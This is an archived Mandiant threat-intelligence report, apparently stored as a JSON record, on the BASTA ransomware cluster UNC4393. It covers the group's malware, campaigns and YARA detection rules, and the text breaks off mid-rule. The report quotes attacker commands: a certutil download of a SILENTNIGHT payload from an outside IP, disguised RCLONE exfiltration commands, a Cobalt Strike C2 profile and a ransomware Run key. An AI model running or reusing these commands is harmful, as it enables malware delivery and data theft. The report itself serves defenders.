{
	"id": "480698aa-2435-483c-8b43-26ea5a8175c6",
	"created_at": "2026-04-06T00:14:46.853793Z",
	"updated_at": "2026-04-10T03:31:36.14837Z",
	"deleted_at": null,
	"sha1_hash": "11aff090bd59803ed7a2e8cf4eab0a9233176e67",
	"title": "UNC4393 Goes Gently into the SILENTNIGHT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 720244,
	"plain_text": "UNC4393 Goes Gently into the SILENTNIGHT\r\nBy Mandiant\r\nPublished: 2024-07-29 · Archived: 2026-04-05 15:50:01 UTC\r\nWritten by: Josh Murchie, Ashley Pearson,  Joseph Pisano,  Jake Nicastro,  Joshua Shilko, Raymond Leong\r\nOverview\r\nIn mid-2022, Mandiant's Managed Defense detected multiple intrusions involving QAKBOT, leading to the\r\ndeployment of BEACON coupled with other pre-ransomware indicators. This marked Mandiant's initial\r\nidentification of UNC4393, the primary user of BASTA ransomware. Mandiant has responded to over 40 separate\r\nUNC4393 intrusions across 20 different industry verticals. While healthcare organizations have not traditionally\r\nbeen a focus for UNC4393, several breaches in the industry this year indicate a possible expansion of their\r\ninterests. However, this represents only a fraction of the cluster's victims, with the Black Basta data leak site\r\npurporting over 500 victims since inception.\r\nOver the course of this blog post, Mandiant will detail the evolution of UNC4393's operational tactics and\r\nmalware usage throughout its active lifespan, with a focus on the period following the QAKBOT botnet takedown.\r\nWe will highlight the cluster's transition from readily available tools to custom malware development as well as its\r\nevolving reliance on access brokers and diversification of initial access techniques.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 1 of 17\n\nFigure 1: UNC4393 intrusion lifecycle\r\nAttribution and Targeting\r\nUNC4393 is a financially motivated threat cluster, and the primary user of BASTA ransomware, tracked since\r\nmid-2022 but likely active since early 2022 based on activity on the BASTA DLS.  The group has overwhelmingly\r\nleveraged initial access gained via UNC2633 and UNC2500 QAKBOT botnet infections to deploy BASTA\r\nransomware. QAKBOT is typically distributed via phishing emails containing malicious links or attachments. In\r\nsome cases, HTML smuggling has also been used to distribute ZIP files containing IMG files that house LNK files\r\nand QAKBOT payloads. \r\nMandiant suspects BASTA operators maintain a private or small, closed-invitation affiliate model whereby only\r\ntrusted third-party actors are provided with use of the BASTA encryptor. Unlike traditional ransomware-as-a-service (RaaS), BASTA is not publicly marketed and its operators do not appear to actively recruit affiliates to\r\ndeploy the ransomware. Instead, they focus on acquiring initial access via partnerships or purchases in\r\nunderground communities. This deviates from traditional RaaS models, which focus on the ransomware\r\ndevelopment and related services such as the data leak site (DLS) that are provided to affiliates in exchange for\r\ndirectly distributing the ransomware. While UNC4393 is the only currently active threat cluster deploying BASTA\r\nthat Mandiant tracks, we cannot rule out the possibility that other, vetted threat actors may also be given access to\r\nthe encrypter.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 2 of 17\n\nThe hundreds of BASTA ransomware victims claimed on the DLS appear credible due to UNC4393’s rapid\r\noperational tempo. With a median time to ransom of approximately 42 hours, UNC4393 has demonstrated\r\nproficiency in quickly performing reconnaissance, data exfiltration, and completing actions on objectives.\r\n…And Then There Were Two\r\nAt the onset of the BASTA ransomware deployment in 2022, Mandiant initially tracked associated activity similar\r\nto other RaaS models with operators and affiliates. Caution was exercised in attributing activity to a single cluster\r\ngiven the possibility of disparate actors within a RaaS model. Through our merge research methodology, Mandiant\r\nconsolidated its tracking to two primary clusters: UNC4393 and UNC3973. While UNC4393 encompasses the\r\nmajority of BASTA-related activity, UNC3973 demonstrates unique attributes and tactics, techniques, and\r\nprocedures (TTPs), which warrant separate tracking. This consolidation suggests that the operators of BASTA\r\nransomware work with a highly exclusive and tightly knit group. \r\nMalware Observed\r\nMandiant has observed UNC4393 deploying the following malware:\r\nMalware\r\nFamily\r\nDescription\r\nBASTA\r\nBASTA is a ransomware written in C++ that encrypts local files. The ransomware is capable\r\nof deleting volume shadow copies. BASTA generates a random ChaCha20 or XChaCha20\r\nkey to encrypt each file; the key is encrypted and appended to the end of the file. The\r\nmalware has been observed using .basta as the extension for encrypted files; however, some\r\nsamples have used a random nine-character alphanumeric extension.\r\nSYSTEMBC\r\nSYSTEMBC is a tunneler written in C that retrieves proxy-related commands from a\r\ncommand-and-control (C2 or C\u0026C) server using a custom binary protocol over TCP. A C2\r\nserver directs SYSTEMBC to act as a proxy between the C2 server and a remote system.\r\nSYSTEMBC is also capable of retrieving additional payloads via HTTP. Some variants may\r\nutilize the Tor network for this purpose. Downloaded payloads may be written to disk or\r\nmapped directly into memory prior to execution. SYSTEMBC is often utilized to hide\r\nnetwork traffic associated with other malware families. Observed families include\r\nDANABOT, SMOKELOADER, and URSNIF.\r\nKNOTWRAP KNOTWRAP is a memory-only dropper written in C/C++ that can execute an additional\r\npayload in memory. Within a designated Portable Executable (PE) section, the embedded\r\npayload contents are compressed and encrypted using a custom stream cipher. The\r\nsecondary payload is executed in the address space of the calling process. Extended\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 3 of 17\n\ncapabilities involve code obfuscation, dynamic resolution of API function addresses, and the\r\nparsing of PE file structures. KNOTWRAP capabilities and/or features could be subject to\r\nvariations based on the compiled build.\r\nKNOTROCK\r\nKNOTROCK is a .NET-based utility that creates a symbolic link on network shares\r\nspecified in a local text file. After creating each symbolic link, KNOTROCK executes what\r\nis presumably a BASTA ransomware executable and provides it with the path to the newly\r\ncreated symbolic link.\r\nDAWNCRY\r\nDAWNCRY is a memory-only dropper that decrypts an embedded resource into memory\r\nwith a hard-coded key of 65 69 55 56 79 72 79 67 6C 3E 58 45 2A 5E 71 78 45 59 69\r\n49 56 56 61 38 34 4C . \r\nThe resource contains three portions of shellcode, one of which contains a DAVESHELL\r\nloader. DAWNCRY also contains a PDB path of SophosFSTelemetry.pdb .\r\nPORTYARD\r\nPORTYARD is a tunneler that establishes connection to a hard-coded C2 server using a\r\ncustom binary protocol over TCP. It accepts commands to establish a TCP connection to a\r\nrelay server and proxies traffic between the hard-coded C2 and relay server via TCP. It\r\ncreates a thread on the system to monitor for incoming connections from the C2, and within\r\nthe thread it checks the first response to validate it.\r\nCOGSCAN\r\nCOGSCAN is a .NET reconnaissance assembly used to gather a list of hosts available on\r\nthe network.\r\nTable 1: UNC4393-deployed malware\r\nInitial Access Brokers\r\nEarly UNC4393 activity nearly exclusively involved leveraging existing QAKBOT infections delivered via\r\nphishing for initial access. In late 2023, several months after the QAKBOT infrastructure takedown by the FBI\r\nand the United States Justice Department, UNC4393 began leveraging other distribution clusters for initial access,\r\nspecifically those delivering DARKGATE, again via phishing. This relationship was short-lived, however, as only\r\na few months later UNC4393 was observed following successful UNC5155 SILENTNIGHT intrusions. As a\r\nresult, UNC4393 has demonstrated a willingness to cooperate with multiple distribution clusters to complete its\r\nactions on objectives.\r\nSILENTNIGHT is a C/C++ backdoor that communicates via HTTP/HTTPS and may utilize a domain generation\r\nalgorithm (DGA) for C2. Its plug-in framework allows for versatile functionality, including system control,\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 4 of 17\n\nscreenshot capture, keylogging, file management, and cryptocurrency wallet access. It also targets credentials\r\nthrough browser manipulation.\r\nInitially observed in late 2019, Mandiant saw a brief lull in SILENTNIGHT usage before a resurgence in mid-2021, lasting only a few months. This was followed by a significant hiatus that lasted until late 2023. This most\r\nrecent surge of SILENTNIGHT activity, beginning earlier this year, has been primarily delivered via malvertising.\r\nThis marked a notable shift away from phishing as UNC4393's only known means of initial access.\r\nInitial Foothold\r\nAfter gaining access to target environments, the remainder of UNC4393 operations consist of a combination of\r\nliving-off-the-land (LotL) techniques and custom malware. \r\nOne consistently observed method for establishing and maintaining a foothold was DNS BEACON. UNC4393 is\r\nknown to reuse variations of the following unique domain-naming conventions:\r\nh.dns. + C2 Domain\r\nridoj4. + \u003c8 character string\u003e + .dns. + C2 Domain\r\njzz. + \u003c8 character string\u003e + .dns. + C2 Domain\r\nwnh. + \u003c8 character string\u003e + .dns. + C2 Domain\r\nAccording to Cobalt Strike documentation, DNS beacons and listeners can be customized using Malleable C2\r\nprofiles. Each unique subdomain can be configured to perform a respective action when called.\r\n# DNS subhost override options added in 4.3:\r\n set beacon \"doc.bc.\";\r\n set get_A \"doc.1a.\";\r\n set get_AAAA \"doc.4a.\";\r\n set get_TXT \"doc.tx.\";\r\n set put_metadata \"doc.md.\";\r\n set put_output \"doc.po.\";\r\n set ns_response \"zero\";\r\nFigure 2: Example Cobalt Strike DNS Beacon Malleable C2\r\nWhile UNC4393 has been observed deploying BEACON early in its intrusions, the group often leverages the\r\npayload throughout its operations.\r\nBeginning in early 2024, UNC4393 was observed deploying a multi-stage infection chain initiated by\r\nDAWNCRY, followed by a DAVESHELL dropper, and ultimately leading to the PORTYARD tunneler.\r\nDAWNCRY is a memory-only dropper that decrypts an embedded resource into memory, which contains the\r\nfollowing three portions of shellcode:\r\n1. [First 0x60C bytes] - A DAVESHELL dropper\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 5 of 17\n\n2. [Bytes 0x60D - 0x19F0] - The main payload, only so far seen as the tunneler PORTYARD. This tunneler\r\ncreates a thread on the system to monitor for incoming connections from the C2, and within the thread\r\nchecks the first response to validate it. It expects to receive one of two commands from the C2 server to\r\nestablish a connection with the relay server:\r\nCommand \"1\" receives the relay server formatted as an IPv4 address and port.\r\nCommand \"3\" receives the relay server formatted as an FQDN and port.\r\n3. [Bytes 0x1A00 - 0x29F2] - A second portion of shellcode, starting with the string \"dave\".\r\nIf one of the required PORTYARD commands is not present, it assumes the connection is established and begins\r\nmonitoring for data from either the relay server or original hard-coded C2 server and proxies data between the two\r\nvia TCP.\r\nFigure 3: DAWNCRY and PORTYARD deployment\r\nInternal Recon \r\nAfter gaining initial access, UNC4393 has commonly relied upon open-source tools such as BLOODHOUND,\r\nADFIND, and PSNMAP to assist in mapping out victim networks and identifying ways to either laterally move or\r\nescalate privileges. UNC4393 will frequently store these tools within the C:\\Users\\Public or C:\\Windows\r\nfolders. We have also observed UNC4393 utilize a scanning tool Mandiant tracks as COGSCAN. \r\nCOGSCAN is a .NET reconnaissance tool used to enumerate hosts on a network and gather system information.\r\nWe suspect UNC4393 refers to this tool internally as GetOnlineComputers due to the following PDB path present\r\nin the sample:\r\nC:\\Users\\ehgrhr\\source\\repos\\GetOnlineComputers\\\r\nGetOnlineComputers\\obj\\x86\\Release\\goc.pdb\r\nFigure 4: Example COGSCAN PDB path\r\nWhile individual samples of COGSCAN contain significantly similar PDB paths with the exception of the\r\nusername, all end with goc.pdb .\r\nCOGSCAN creates the following four distinct artifacts on the endpoint: \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 6 of 17\n\nC:\\users\\public\\online.txt\r\nC:\\users\\public\\pc.txt\r\nC:\\users\\public\\pc_sorted.txt\r\n%CD%\\ldap.txt\r\nWithin these four files, COGSCAN collects the following information:\r\nEndpoint information\r\nMachine name\r\nIpv4\r\nOperating system and revision\r\nLast patch applied\r\nSessions\r\nDomains and LDAP information\r\nEndpoint function\r\nDomain controller\r\nWebserver\r\nScans of multiple registry keys\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Component Based Servicing\\Packages\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\r\nLateral Movement and Persistence\r\nUNC4393 has predominantly relied on SMB BEACON and Remote Desktop Protocol (RDP) to carry out its\r\nlateral movement. As mentioned previously, BEACON usage is ubiquitous in nearly every UNC4393 intrusion.\r\nThe group has demonstrated a predilection for usage of the remote execution via Windows Management\r\nInstrumentation (WMI) capability within Cobalt Strike to spread and launch malware or other tools during the\r\ncourse of its intrusions. For example, in one case, the BASTA encryptor was staged on hosts to be encrypted\r\nbefore being executed via WMI en-masse on over 100 systems within 10 minutes.  \r\nFurthermore, Mandiant observed UNC4393's preference for establishing persistence through the use of a variety\r\nof publicly available remote monitoring and management (RMM) software in its early operations. Specifically, we\r\nobserved UNC4393 utilize ANYDESK, ATERA, SPLASHTOP, SCREENCONNECT, SUPREMO, and\r\nNETSUPPORT. Generally, these tools were saved and launched from C:\\ProgramData , C:\\Windows\\Temp , or\r\nC:\\Dell . \r\nHowever, it is worth noting that these tools seem to have fallen out of favor from the group's preferred TTPs since\r\nlate 2022. Mandiant observed this is the approximate timeframe in which SYSTEMBC tunneler usage began\r\nrising for the group, potentially indicating a shift in operational preferences. Common directories for storing\r\nSYSTEMBC PE binaries include C:\\ProgramData , C:\\Windows , and C:\\Users\\Public . Then, in mid-2023,\r\nthere was a shift in TTPs where SYSTEMBC usage dropped off with seemingly no replacement until early 2024\r\nwhen PORTYARD tunneler usage began.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 7 of 17\n\nIn one observed instance, UNC4393 encountered issues with endpoint antivirus when attempting to establish\r\npersistence on a host. They circumvented this by downloading a SILENTNIGHT malware payload by abusing the\r\nnative Windows command-line utility certutil.\r\nC:\\WINDOWS\\system32\\certutil.exe -urlcache -split -f\r\nhttp://179.60.149.235/KineticaSurge.dll\r\nC:\\Users\\Public\\KineticaSurge.dll\r\nFigure 5: UNC4393 command downloading an UNC5155 SILENTNIGHT binary\r\nRansomware and Extortion\r\nUNC4393's goal is to gather as much data as quickly as possible followed by exfiltration of the collected data to\r\nengage in multi-faceted extortion, leveraging the threat of data leakage to pressure victims into paying ransom\r\ndemands. UNC4393 is often observed utilizing RCLONE for its data theft; RCLONE is a command-line program\r\nthat allows the user to manage files on a variety of cloud storage platforms.\r\nIn order to obscure its activity, UNC4393 commonly masquerades the RCLONE binaries as programs that could\r\nappear at first glance to be legitimate system utilities:\r\nC:\\Windows\\system32\\cmd.exe /C taskenq.exe --config ssd.conf\r\n--max-size 99M --max-age 3y --transfers=99 --no-check-certificate\r\ncopy \"\\\\\u003cREDACTED\u003e\\\u003cREDACTED\u003e$\" \u003cREMOTE SHARE\u003e\r\nC:\\Windows\\system32\\cmd.exe /C tasksend.exe --config cfg.conf\r\n--max-size 99M --max-age 7y --transfers=199 --no-check-certificate\r\ncopy \"\\\\\u003cREDACTED\u003e\\M$\\Users\" \u003cREMOTE SHARE\u003e\r\nFigure 6: Example RCLONE exfiltration commands\r\nInitially, UNC4393 employed a more manual approach to deploying its encryptor. This included manual\r\ninvocation of the BASTA binary directly from C:\\Windows or C:\\Users\\Public . The group had been seen to\r\nutilize registry run keys to launch the binary as well.\r\n\u003cHIVE\u003e\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Skype --\u003e\r\nC:\\Windows\\Basta_Ransomware.exe\r\nFigure 7: Windows Registry key to run BASTA ransomware\r\nIn late 2023, UNC4393 began leveraging KNOTROCK, a custom .NET-based utility that creates a symbolic link\r\non network shares specified in a local text file. After creating each symbolic link, KNOTROCK executes a\r\nBASTA ransomware executable and provides it with the path to the newly created symbolic link. Ultimately,\r\nKNOTROCK serves a dual purpose: it assists the existing BASTA encryptor by providing network\r\ncommunication capabilities and streamlines operations by proactively mapping out viable network paths, thereby\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 8 of 17\n\nreducing deployment time and accelerating the encryption process. KNOTROCK represents an evolution in\r\nUNC4393's operations, augmenting its capabilities by expediting the encryption process to enable larger-scale\r\nattacks and significantly decreasing its time to ransom.\r\nInterestingly, on two separate occasions this group gave up entirely when attempting to encrypt its target. If the\r\nexecution of its ransomware binary fails, Mandiant has observed that UNC4393 will effectively stop attempting to\r\nransom and cease its operation. Taking this fact into totality with the number of victims that UNC4393 purports on\r\nits data leak site, it is plausible that the number of ongoing intrusions the group is actively working at one time\r\nnecessitates shifting priorities to other victims when encountering friction. That being said, an unsuccessful\r\nransom attempt does not ensure future immunity; Mandiant has observed UNC4393 retargeting previously\r\ncompromised environments months after a failed BASTA deployment. \r\nConclusion\r\nUNC4393 has proven to be an adaptable and prolific threat actor in the cyber crime landscape. Its evolution from\r\nopportunistic QAKBOT infections to strategic partnerships with initial access brokers demonstrates a willingness\r\nto diversify and optimize its operations. Notably, while BASTA has been in the top DLSs that we track, the\r\nnumber of victims has steadily declined in recent months (Figure 8). Although July is not yet over, with less than a\r\nweek remaining, any significant change to the downward trend seems unlikely. It is plausible that this decline\r\nreflects difficulties in obtaining a reliable stream of initial access. \r\nWhile its early reliance on readily available tools has shifted towards custom malware development, its core focus\r\non efficient data exfiltration and multi-faceted extortion remains constant. Further, the transition from manual\r\nransomware deployment to the development of KNOTROCK exemplifies UNC4393's commitment to improving\r\nits tactics. This, combined with its swift operational tempo, poses a significant challenge to defenders. The\r\ncluster's avoidance of healthcare institutions and its global reach further underscore its calculated and financially\r\ndriven approach.\r\nAs the threat landscape continues to evolve, understanding the intricacies of UNC4393's operations becomes\r\ncrucial for organizations seeking to protect themselves. UNC4393's ability to adapt, innovate, and leverage\r\nvarious tools and techniques highlights the need for proactive and robust security measures.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 9 of 17\n\nFigure 8: Identified listings on the BASTA DLS\r\nCampaign Tracking\r\nMandiant has tracked three distinct campaigns related to UNC4393 operations since 2022, with additional\r\nindicators and context available to Google Threat Intelligence customers:\r\nCampaign 22-053\r\nIn November 2022, Mandiant identified multiple intrusions attributed to UNC4393 where BASTA ransomware\r\nwas deployed, and initial network access was obtained via malicious emails distributed by UNC2633 delivering\r\nQAKBOT. After obtaining access from UNC2633, UNC4393 has deployed various tools, including Cobalt Strike\r\nBEACON and the SYSTEMBC tunneler. UNC4393 has then exfiltrated data using Rclone and deployed BASTA\r\nransomware. Notably, in some cases UNC4393 has monetized access within a few days of obtaining access to the\r\nenvironment.\r\nOur findings are consistent with Mandiant’s prior observation that actors currently distributing BASTA show\r\nnotable TTP overlaps with intrusion operators that were previously affiliated with the historical TRICKBOT and\r\nCONTI ecosystems. \r\nCampaign 23-053\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 10 of 17\n\nSince at least early September 2023, UNC4393 has leveraged UNC2500 DARKGATE infections to obtain access\r\nto victim networks for BASTA ransomware operations. In at least one case, UNC4393 assumed control of a host\r\nwithin several hours of the initial DARKGATE deployment, then proceeded to deploy a Domain Name System\r\n(DNS)-based Cobalt Strike BEACON payload to establish a foothold. UNC4393 used PsExec and Windows\r\nAdmin Shares to move across the network environment, deployed the RCLONE command-line utility to exfiltrate\r\ndata, then manually launched a BASTA payload stored on a compromised Windows server. Historically,\r\nUNC4393 has leveraged access obtained by distribution threat clusters, including UNC2500 and UNC2633, to\r\ndeploy BASTA ransomware and to engage in data theft extortion.\r\nCampaign 24-018\r\nBeginning in late February 2024, UNC4393 was observed conducting data theft extortion operations and\r\ndeploying BASTA ransomware. In cases where the initial entry vector was determined, threat actors used stolen\r\ncredentials or relied on brute-force methods to authenticate with externally facing network appliances or servers.\r\nAfter gaining access, UNC4393 leveraged both proprietary and publicly available malware to deploy other code\r\nfamilies, establish a foothold, and conduct network reconnaissance. During intrusions, malware such as\r\nBEACON, COGSCAN, KNOTWRAP, KNOTROCK, PORTYARD, POWERSPLOIT, and POWERVIEW were\r\nused. \r\nSubsequent access to other internal systems and/or lateral movement were primarily achieved through remote\r\nservices, including Windows administrative shares, RDP, and Server Message Block (SMB). In certain cases, prior\r\nto the deployment of ransomware, threat actors collected sensitive data and exfiltrated it via RCLONE for use in\r\nlater extortion attempts. The first appearance of BASTA samples in the affected networks ranged from a few days\r\nto weeks after the initial access, impacting Windows and ESXi systems. While UNC4393's TTPs and\r\nmonetization methods remain relatively consistent from previous operations, the group appears to be diversifying\r\nits initial access sources.\r\nDetection and Mitigation\r\nTo assist the wider community in hunting and identifying activity outlined in this blog post, we have included a\r\nsubset of these indicators of compromise (IOCs) in this post, and in a publicly available GTI Collection.\r\nAcknowledgements\r\nWe would like to acknowledge the contributions of Paul Tarter, and the other members of the FLARE team, for\r\nassisting with our understanding of the aforementioned malware. Additionally, we would like to thank the efforts\r\nof the Mandiant Research Team in assisting with our understanding of UNC4393.\r\nYARA Rules\r\nBASTA\r\nrule M_Ransomware_BASTA_1\r\n{\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 11 of 17\n\nmeta:\r\n author = \"Mandiant”\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n md5 = \"3f400f30415941348af21d515a2fc6a3\"\r\n platforms = \"Windows\"\r\n malware_family = \"BASTA\"\r\n strings:\r\n $domain = \"aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt\r\n33s77xypi7nypxyd\"\r\n $keyiso = \"keyiso\" nocase wide\r\n $note = \"Your company id for log in\"\r\n condition:\r\n uint16(0) == 0x5A4D and (all of them)\r\n}\r\nrule M_Ransomware_BASTA_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n platforms = \"Windows\"\r\n malware_family = \"BASTA\"\r\n strings:\r\n$str1 = \"ATTENTION!\"\r\n$str2 = \"https://basta\"\r\n$str3 = \"network has been breached\"\r\n$str5 = \"instructions_read_me.txt\"\r\n$str6 = \"Do not modify, rename or delete files\"\r\ncondition:\r\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) ==\r\n0x00004550 and all of them\r\n}\r\nrule M_Ransomware_BASTA_3\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n platforms = \"Windows\"\r\n malware_family = \"BASTA\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 12 of 17\n\nstrings:\r\n $code1 = {8B 86 [4]2B 46 ?? 40 0F AF 86 [4]89 86 [4]8B\r\n46 ?? 31 04 0F}\r\n $code2 = {8B 0? 0? A1 [4]33 88 [4]8B 80 [4]89 0? 0? }\r\n $code3 = {C1 E? 10 [0-6] 88 ?? 0? 8B ?? FF 4? ?? [5-9] C1\r\nE? 08 [0-9]88 ?? 0? [0-5] FF 4? ?? 8B 4? ?? 8B 8? [4] 88 1C 01}\r\n $decr1 = {F7 74 8E ?? 0F B6 15 [4] 33 C2 A2}\r\n $decr2 = {33 44 0A ?? B9 [4]D1 E1 8B 55 ?? 89 44 0A}\r\n $decr3 = {2B 0D [4]81 F1 [4]33 88 [4]BA [4]6B C2 00 89 88}\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) ==\r\n0x00004550 and (2 of ($code*) or all of ($decr*))\r\n \r\n}\r\nKNOTWRAP\r\nrule M_Dropper_KNOTWRAP_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n md5 = \"56c1a45c762a29fe6080788f85e6cfc3\"\r\n platforms = \"Windows\"\r\n malware_family = \"KNOTWRAP\"\r\n strings:\r\n $hex_asm_snippet_a = { B9 18 01 00 00 2? F8 }\r\n $hex_asm_snippet_b = { 84 C? (7?|E?) [0-4] 32 D? C1 C2 08 }\r\n $hex_asm_snippet_c = { 25 FF 0F 00 00 03 4? 08 03 C? 29 1? }\r\n $hex_asm_snippet_d = { 0F BA F0 1F (7?|E?) [0-4] 03 4? 08 8D\r\n4? 02 5? 5? FF 55 }\r\n condition:\r\n all of them\r\n}\r\nrule M_Dropper_KNOTWRAP_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 13 of 17\n\ndescription = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n platforms = \"Windows\"\r\n malware_family = \"KNOTWRAP\"\r\n \r\n strings:\r\n $str1 = \"Executable (*.exe)|*.exe|Command (*.com)|*.com|Information\r\n(*.pdf)|*.pdf|Batch (*.bat)|*.bat|All Files (*.*)|*.*||\" wide\r\n $str2 = \"Default Menu=Default application menu. Appears when\r\nno documents are open.\" wide\r\n $str3 = \"All CommandsMAll your changes will be lost!\" wide\r\n $str4 = \"Windows sockets initialization failed.\" wide\r\n $str5 = \"TextMining\" wide\r\n $str6 = \"mailto:stefan-mihai@moga.doctor\" wide\r\n $api1 = \"[CryptoAPI]\" wide\r\n $api2 = \"CryptDecrypt:\" wide\r\n $api3 = \"CryptDeriveKey:\" wide\r\n $api4 = \"CryptHashData:\" wide\r\n $api5 = \"CryptCreateHash:\" wide\r\n $api6 = \"CryptAcquireContext:\" wide\r\n $api7 = \"CryptEncrypt:\"wide\r\n \r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550\r\nand all of them\r\n \r\n}\r\nKNOTROCK\r\nrule M_Utility_KNOTROCK_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n md5 = \"b2af1cd157221f240ce8f8fa88bf6d44\"\r\n platforms = \"Windows\"\r\n malware_family = \"KNOTROCK\"\r\n strings:\r\n $s1 = \"Specify path to shares list in 1st argument.\r\nSpecify locker path in 2nd argument\" wide fullword\r\n $s2 = \"(like C:\\\\Windows\\\\locker.exe)\" wide fullword\r\n $s3 = \"-forcepath\" wide fullword\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 14 of 17\n\n$s4 = \"-nomutex\" wide fullword\r\n $c1 = \"lpSymlinkFileName\" fullword\r\n $c2 = \"lpTargetFileName\" fullword\r\n $c3 = \"CreateSymbolicLink\" fullword\r\n $marker1 = \"$7d7b40c2-b763-4388-ac13-79711209439b\"\r\nfullword\r\n $marker2 = \"C:\\\\Users\\\\cdsf\\\\source\\\\repos\\\\LinkShares\\\\\r\nLinkShares\\\\obj\\\\Release\\\\LinkShares.pdb\" fullword\r\n condition:\r\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)\r\nand ((3 of ($s*) and all of ($c*) ) or any of ($marker*))\r\n \r\n}\r\nCOGSCAN\r\nrule M_Recon_COGSCAN_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n family = \"COGSCAN\"\r\n md5 = \"d4fd61c1bb582b77a87259bcd44178d4\"\r\n platform = \"Windows\"\r\n \r\n strings:\r\n $str_format = \"{0,-20}|{1,-10}|{2,-10}|{3,-20}|{4, -50}|{5, -15}|\r\n{6, -7}|{7, -10}|{8, -10}\" wide fullword\r\n $str_param1 = \"PcName\" wide fullword\r\n $str_param2 = \"Ping?\" wide fullword\r\n $str_param3 = \"135(rpc)\" wide fullword\r\n $str_param4 = \"OsName\" wide fullword\r\n $str_param5 = \"LastKb\" wide fullword\r\n $str_param6 =\"Site\" wide fullword\r\n $str_func1 = \"CheckForZLAndWC\" fullword\r\n $str_func2 = \"GetTypeFromProgID\" fullword\r\n $str_func3 = \"CheckForPN\" fullword\r\n $str_func4 = \"TryGetOsName\" fullword\r\n $str_func5 = \"TryPrepare\" fullword\r\n $str_func6 = \"CustomLDAP\" fullword\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight\r\nPage 15 of 17\n\n$file1 = \"ldap.txt\" wide fullword\r\n $file2 = \"c:\\\\users\\\\public\\\\pc.txt\" wide fullword nocase\r\n $file3 = \"c:\\\\users\\\\public\\\\online.txt\" wide fullword nocase\r\n $file4 = \"_sorted.txt\" wide fullword\r\n $file5 = \"Take your file: online.txt\" wide fullword\r\n $file6 = \"Take sorted file: sorted.txt\" wide fullword\r\n $arg1 = \"-customldap\" wide fullword\r\n $arg2 = \"-pingtimeout\" wide fullword\r\n $arg3 = \"-offlineresolve\" wide fullword\r\n $arg4 = \"-autoruninfo\" wide fullword\r\n $arg5 = \"-detectsites\" wide fullword\r\n $arg6 = \"-bypassping\" wide fullword\r\n $arg7 = \"-fromfile\" wide fullword\r\n $arg8 = \"-printcountonly\" wide fullword\r\n $marker1 = \"---UNKNOWN---\" wide fullword\r\n $marker2 = \"---DC---\" wide fullword\r\n $marker3 = \"---SERVERS---\" wide fullword\r\n $marker4 = \"---USER PC---\" wide fullword\r\n condition:\r\n (uint16(0)==0x5A4D and uint32(uint32(0x3C))==0x00004550)\r\nand (4 of ($str*) and 2 of ($file*) and 3 of ($arg*) and 1 of ($marker*))\r\n}\r\nPORTYARD\r\nrule M_Tunneler_PORTYARD_1 {\r\n meta:\r\n description = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n family = \"portyard\"\r\n md5 = \"25dd591a343e351fd72b6278ebf8197e\"\r\n platform = \"Windows\"\r\n \r\n strings:\r\n $tunnel_commands_validate = {41 B? 04 00 00 00 [0-16]\r\n41 B9 08 00 00 00 [0-24] FF 15 [4-64] 0F B6 45 ?? 3C 01}\r\n $intial_connection_validate = {41 B? A0 1F 00 00 [0-32] ff\r\n15 [4-64] 48 0F ?? ?? 01 [0-32] 48 85 C? [0-64] 40 38 ?? ?? 02 [0-8]\r\n48 FF C? 48 3B C? [2-64] C7 45 ?? 05 00 [1-16] FF 15}\r\n condition:\r\n all of them\r\n 